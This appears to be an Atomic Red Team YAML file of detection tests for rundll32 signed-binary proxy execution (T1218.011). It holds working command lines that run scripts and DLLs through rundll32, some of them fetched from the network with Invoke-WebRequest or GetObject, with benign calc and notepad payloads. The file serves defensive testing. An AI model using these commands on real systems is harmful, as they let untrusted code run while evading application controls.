Hare Sudhan
c8a70997da
* Update T1202.yaml * fix all atomics * changing to macos to fix pytest issue * changing to macos to fix pytest issue * adding gitignore
361 lines
15 KiB
YAML
361 lines
15 KiB
YAML
attack_technique: T1218.011
|
|
display_name: 'Signed Binary Proxy Execution: Rundll32'
|
|
atomic_tests:
|
|
- name: Rundll32 execute JavaScript Remote Payload With GetObject
|
|
auto_generated_guid: 57ba4ce9-ee7a-4f27-9928-3c70c489b59d
|
|
description: |
|
|
Test execution of a remote script using rundll32.exe. Upon execution notepad.exe will be opened.
|
|
This has been used by Win32/Poweliks malware and works as described [here](https://www.stormshield.com/news/poweliks-command-line-confusion/)
|
|
|
|
Note: The GetObject function is no longer supported in Internet Explorer v9 (2011) and later so this technique would only work where very old versions of IE are installed.
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
file_url:
|
|
description: location of the payload
|
|
type: url
|
|
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.011/src/T1218.011.sct
|
|
executor:
|
|
command: |
|
|
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec();window.close();
|
|
cleanup_command: |
|
|
taskkill /IM notepad.exe /f
|
|
name: command_prompt
|
|
- name: Rundll32 execute VBscript command
|
|
auto_generated_guid: 638730e7-7aed-43dc-bf8c-8117f805f5bb
|
|
description: |
|
|
Test execution of a command using rundll32.exe and VBscript in a similar manner to the JavaScript test.
|
|
Technique documented by Hexacorn- http://www.hexacorn.com/blog/2019/10/29/rundll32-with-a-vbscript-protocol/
|
|
Upon execution calc.exe will be launched
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
command_to_execute:
|
|
description: Command for rundll32.exe to execute
|
|
type: string
|
|
default: calc.exe
|
|
executor:
|
|
command: |
|
|
rundll32 vbscript:"\..\mshtml,RunHTMLApplication "+String(CreateObject("WScript.Shell").Run("#{command_to_execute}"),0)
|
|
name: command_prompt
|
|
- name: Rundll32 execute VBscript command using Ordinal number
|
|
auto_generated_guid: 32d1cf1b-cbc2-4c09-8d05-07ec5c83a821
|
|
description: |
|
|
Test execution of a command using rundll32.exe and VBscript in a similar manner to the JavaScript test.
|
|
Technique documented by Hexacorn- http://www.hexacorn.com/blog/2019/10/29/rundll32-with-a-vbscript-protocol/
|
|
Upon execution calc.exe will be launched
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
command_to_execute:
|
|
description: Command for rundll32.exe to execute
|
|
type: string
|
|
default: calc.exe
|
|
executor:
|
|
command: |
|
|
rundll32 vbscript:"\..\mshtml,#135 "+String(CreateObject("WScript.Shell").Run("#{command_to_execute}"),0)
|
|
name: command_prompt
|
|
- name: Rundll32 advpack.dll Execution
|
|
auto_generated_guid: d91cae26-7fc1-457b-a854-34c8aad48c89
|
|
description: |
|
|
Test execution of a command using rundll32.exe with advpack.dll.
|
|
Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Advpack.yml
|
|
Upon execution calc.exe will be launched
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
inf_to_execute:
|
|
description: Local location of inf file
|
|
type: string
|
|
default: PathToAtomicsFolder\T1218.011\src\T1218.011.inf
|
|
dependency_executor_name: powershell
|
|
dependencies:
|
|
- description: |
|
|
Inf file must exist on disk at specified location ("#{inf_to_execute}")
|
|
prereq_command: |
|
|
if (Test-Path "#{inf_to_execute}") {exit 0} else {exit 1}
|
|
get_prereq_command: |
|
|
New-Item -Type Directory (split-path "#{inf_to_execute}") -ErrorAction ignore | Out-Null
|
|
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011.inf" -OutFile "#{inf_to_execute}"
|
|
executor:
|
|
command: |
|
|
rundll32.exe advpack.dll,LaunchINFSection "#{inf_to_execute}",DefaultInstall_SingleUser,1,
|
|
name: command_prompt
|
|
- name: Rundll32 ieadvpack.dll Execution
|
|
auto_generated_guid: 5e46a58e-cbf6-45ef-a289-ed7754603df9
|
|
description: |
|
|
Test execution of a command using rundll32.exe with ieadvpack.dll.
|
|
Upon execution calc.exe will be launched
|
|
|
|
Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Ieadvpack.yml
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
inf_to_execute:
|
|
description: Local location of inf file
|
|
type: string
|
|
default: PathToAtomicsFolder\T1218.011\src\T1218.011.inf
|
|
dependency_executor_name: powershell
|
|
dependencies:
|
|
- description: |
|
|
Inf file must exist on disk at specified location ("#{inf_to_execute}")
|
|
prereq_command: |
|
|
if (Test-Path "#{inf_to_execute}") {exit 0} else {exit 1}
|
|
get_prereq_command: |
|
|
New-Item -Type Directory (split-path "#{inf_to_execute}") -ErrorAction ignore | Out-Null
|
|
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011.inf" -OutFile "#{inf_to_execute}"
|
|
executor:
|
|
command: |
|
|
rundll32.exe ieadvpack.dll,LaunchINFSection "#{inf_to_execute}",DefaultInstall_SingleUser,1,
|
|
name: command_prompt
|
|
- name: Rundll32 syssetup.dll Execution
|
|
auto_generated_guid: 41fa324a-3946-401e-bbdd-d7991c628125
|
|
description: |
|
|
Test execution of a command using rundll32.exe with syssetup.dll. Upon execution, a window saying "installation failed" will be opened
|
|
|
|
Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Syssetup.yml
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
inf_to_execute:
|
|
description: Local location of inf file
|
|
type: string
|
|
default: PathToAtomicsFolder\T1218.011\src\T1218.011_DefaultInstall.inf
|
|
dependency_executor_name: powershell
|
|
dependencies:
|
|
- description: |
|
|
Inf file must exist on disk at specified location ("#{inf_to_execute}")
|
|
prereq_command: |
|
|
if (Test-Path "#{inf_to_execute}") {exit 0} else {exit 1}
|
|
get_prereq_command: |
|
|
New-Item -Type Directory (split-path "#{inf_to_execute}") -ErrorAction ignore | Out-Null
|
|
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011_DefaultInstall.inf" -OutFile "#{inf_to_execute}"
|
|
executor:
|
|
command: |
|
|
rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 "#{inf_to_execute}"
|
|
name: command_prompt
|
|
- name: Rundll32 setupapi.dll Execution
|
|
auto_generated_guid: 71d771cd-d6b3-4f34-bc76-a63d47a10b19
|
|
description: |
|
|
Test execution of a command using rundll32.exe with setupapi.dll. Upon execution, a windows saying "installation failed" will be opened
|
|
|
|
Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Setupapi.yml
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
inf_to_execute:
|
|
description: Local location of inf file
|
|
type: string
|
|
default: PathToAtomicsFolder\T1218.011\src\T1218.011_DefaultInstall.inf
|
|
dependency_executor_name: powershell
|
|
dependencies:
|
|
- description: |
|
|
Inf file must exist on disk at specified location ("#{inf_to_execute}")
|
|
prereq_command: |
|
|
if (Test-Path "#{inf_to_execute}") {exit 0} else {exit 1}
|
|
get_prereq_command: |
|
|
New-Item -Type Directory (split-path "#{inf_to_execute}") -ErrorAction ignore | Out-Null
|
|
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011_DefaultInstall.inf" -OutFile "#{inf_to_execute}"
|
|
executor:
|
|
command: |
|
|
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 "#{inf_to_execute}"
|
|
name: command_prompt
|
|
- name: Execution of HTA and VBS Files using Rundll32 and URL.dll
|
|
auto_generated_guid: 22cfde89-befe-4e15-9753-47306b37a6e3
|
|
description: |
|
|
IcedID uses this TTP as follows:
|
|
rundll32.exe url.dll,OpenURL %PUBLIC%\index.hta
|
|
Trickbot uses this TTP as follows:
|
|
rundll32.exe URL.dll,FileProtocolHandler C:\\..\\Detail\\akteullen.vbs
|
|
|
|
In this atomic, the sample hta file opens the calculator and the vbs file shows a message dialog with "rundll32 spawned wscript"
|
|
supported_platforms:
|
|
- windows
|
|
executor:
|
|
command: |
|
|
rundll32.exe url.dll,OpenURL "PathToAtomicsFolder\T1218.011\src\index.hta"
|
|
rundll32.exe URL.dll,FileProtocolHandler "PathToAtomicsFolder\T1218.011\src\akteullen.vbs"
|
|
name: command_prompt
|
|
- name: Launches an executable using Rundll32 and pcwutl.dll
|
|
auto_generated_guid: 9f5d081a-ee5a-42f9-a04e-b7bdc487e676
|
|
description: |
|
|
Executes the LaunchApplication function in pcwutl.dll to proxy execution of an executable.
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
exe_to_launch:
|
|
description: Path of the executable to launch
|
|
type: path
|
|
default: '%windir%\System32\notepad.exe'
|
|
executor:
|
|
command: |
|
|
rundll32.exe pcwutl.dll,LaunchApplication #{exe_to_launch}
|
|
name: command_prompt
|
|
- name: Execution of non-dll using rundll32.exe
|
|
auto_generated_guid: ae3a8605-b26e-457c-b6b3-2702fd335bac
|
|
description: |
|
|
Rundll32.exe running non-dll
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
input_url:
|
|
description: Url to download the DLL
|
|
type: url
|
|
default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1047/bin/calc.dll
|
|
input_file:
|
|
description: Non-dll file
|
|
type: string
|
|
default: C:\Users\$env:username\Downloads\calc.png
|
|
dependency_executor_name: powershell
|
|
dependencies:
|
|
- description: |
|
|
Non-dll file must exist on disk at specified location
|
|
prereq_command: |
|
|
if (Test-Path #{input_file}) {exit 0} else {exit 1}
|
|
get_prereq_command: |
|
|
Invoke-WebRequest "#{input_url}" -OutFile "#{input_file}"
|
|
executor:
|
|
name: powershell
|
|
command: |
|
|
rundll32.exe #{input_file}, StartW
|
|
- name: Rundll32 with Ordinal Value
|
|
auto_generated_guid: 9fd5a74b-ba89-482a-8a3e-a5feaa3697b0
|
|
description: |
|
|
Rundll32.exe loading dll using ordinal value #2 to DLLRegisterServer.
|
|
Upon successful execution, Calc.exe will spawn.
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
input_url:
|
|
description: Url to download the DLL
|
|
type: url
|
|
default: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/bin/AllTheThingsx64.dll
|
|
input_file:
|
|
description: DLL File
|
|
type: string
|
|
default: PathToAtomicsFolder\T1218.010\bin\AllTheThingsx64.dll
|
|
dependency_executor_name: powershell
|
|
dependencies:
|
|
- description: |
|
|
DLL file must exist on disk at specified location
|
|
prereq_command: |
|
|
if (Test-Path "#{input_file}") {exit 0} else {exit 1}
|
|
get_prereq_command: |
|
|
Invoke-WebRequest "#{input_url}" -OutFile "#{input_file}"
|
|
executor:
|
|
name: command_prompt
|
|
command: |
|
|
rundll32.exe "#{input_file}",#2
|
|
- name: Rundll32 with Control_RunDLL
|
|
auto_generated_guid: e4c04b6f-c492-4782-82c7-3bf75eb8077e
|
|
description: |
|
|
Rundll32.exe loading dll with 'control_rundll' within the command-line, loading a .cpl or another file type related to CVE-2021-40444.
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
input_url:
|
|
description: Url to download the DLL
|
|
type: url
|
|
default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1047/bin/calc.dll
|
|
input_file:
|
|
description: DLL File
|
|
type: string
|
|
default: PathToAtomicsFolder\T1047\bin\calc.dll
|
|
dependency_executor_name: powershell
|
|
dependencies:
|
|
- description: |
|
|
DLL file must exist on disk at specified location
|
|
prereq_command: |
|
|
if (Test-Path "#{input_file}") {exit 0} else {exit 1}
|
|
get_prereq_command: |
|
|
Invoke-WebRequest "#{input_url}" -OutFile "#{input_file}"
|
|
executor:
|
|
name: command_prompt
|
|
command: |
|
|
rundll32.exe shell32.dll,Control_RunDLL "#{input_file}"
|
|
- name: Rundll32 with desk.cpl
|
|
auto_generated_guid: 83a95136-a496-423c-81d3-1c6750133917
|
|
description: |
|
|
Rundll32.exe loading an executable renamed as .scr using desk.cpl
|
|
Reference:
|
|
- [LOLBAS - Libraries/Desk](https://lolbas-project.github.io/lolbas/Libraries/Desk/)
|
|
SIGMA rules:
|
|
- [SCR File Write Event](https://github.com/SigmaHQ/sigma/blob/b53f08b081e0a50099be9b9e8eced82097fdbaf2/rules/windows/file_event/file_event_win_new_src_file.yml)
|
|
- [Rundll32 InstallScreenSaver Execution](https://github.com/SigmaHQ/sigma/blob/b53f08b081e0a50099be9b9e8eced82097fdbaf2/rules/windows/process_creation/proc_creation_win_lolbin_rundll32_installscreensaver.yml)
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
exe_to_launch:
|
|
description: Path of the executable to launch
|
|
type: path
|
|
default: '%windir%\System32\calc.exe'
|
|
executor:
|
|
name: command_prompt
|
|
command: |
|
|
copy #{exe_to_launch} not_an_scr.scr
|
|
rundll32.exe desk.cpl,InstallScreenSaver not_an_scr.scr
|
|
cleanup_command: del not_an_scr.scr
|
|
|
|
- name: Running DLL with .init extension and function
|
|
auto_generated_guid: 2d5029f0-ae20-446f-8811-e7511b58e8b6
|
|
description: |
|
|
This test, based on common Gamarue tradecraft, consists of a DLL file with a .init extension being run by rundll32.exe. When this DLL file's 'krnl' function is called, it launches a Windows pop-up.
|
|
DLL created with the AtomicTestHarnesses Portable Executable Builder script.
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
dll_file:
|
|
description: The DLL file to be called
|
|
type: string
|
|
default: PathToAtomicsFolder\T1218.011\bin\_WT.init
|
|
dll_url:
|
|
description: The URL to the DLL file that must be downloaded
|
|
type: url
|
|
default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/bin/_WT.init
|
|
dependency_executor_name: powershell
|
|
dependencies:
|
|
- description: The DLL file to be called must exist at the specified location (#{dll_file})
|
|
prereq_command: if (Test-Path "#{dll_file}") {exit 0} else {exit 1}
|
|
get_prereq_command: |
|
|
New-Item -Type Directory (split-path "#{dll_file}") -ErrorAction ignore | Out-Null
|
|
Invoke-WebRequest "#{dll_url}" -OutFile "#{dll_file}"
|
|
executor:
|
|
command: |
|
|
rundll32.exe #{dll_file},krnl
|
|
name: command_prompt
|
|
- name: Rundll32 execute command via FileProtocolHandler
|
|
auto_generated_guid: f3ad3c5b-1db1-45c1-81bf-d3370ebab6c8
|
|
description: |
|
|
Test execution of a command using rundll32.exe and the FileProtocolHandler technique.
|
|
Upon execution, calc.exe will be launched.
|
|
This technique is documented by Levan Abesadze - https://medium.com/@Wolverineisstillalive/system-binary-proxy-execution-rundll32-bypass-method-790871e1f2b7
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
command_to_execute:
|
|
description: Command for rundll32.exe to execute
|
|
type: string
|
|
default: calc.exe
|
|
executor:
|
|
command: |
|
|
rundll32.exe url.dll,FileProtocolHandler #{command_to_execute}
|
|
name: command_prompt
|
|
- name: Rundll32 execute payload by calling RouteTheCall
|
|
auto_generated_guid: 8a7f56ee-10e7-444c-a139-0109438288eb
|
|
description: |
|
|
Launch an executable payload by calling RouteTheCall. Test execution of a command using rundll32.exe to execute a payload{calc.exe} by calling RouteTheCall. Upon execution, calc.exe will be launched.
|
|
Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Zipfldr.yml
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
exe_to_launch:
|
|
description: Path of the executable to launch
|
|
type: path
|
|
default: "'%windir%\\System32\\calc.exe'"
|
|
executor:
|
|
command: rundll32.exe zipfldr.dll,RouteTheCall "#{exe_to_launch}"
|
|
cleanup_command:
|
|
name: powershell
|
|
elevation_required: false
|
|
|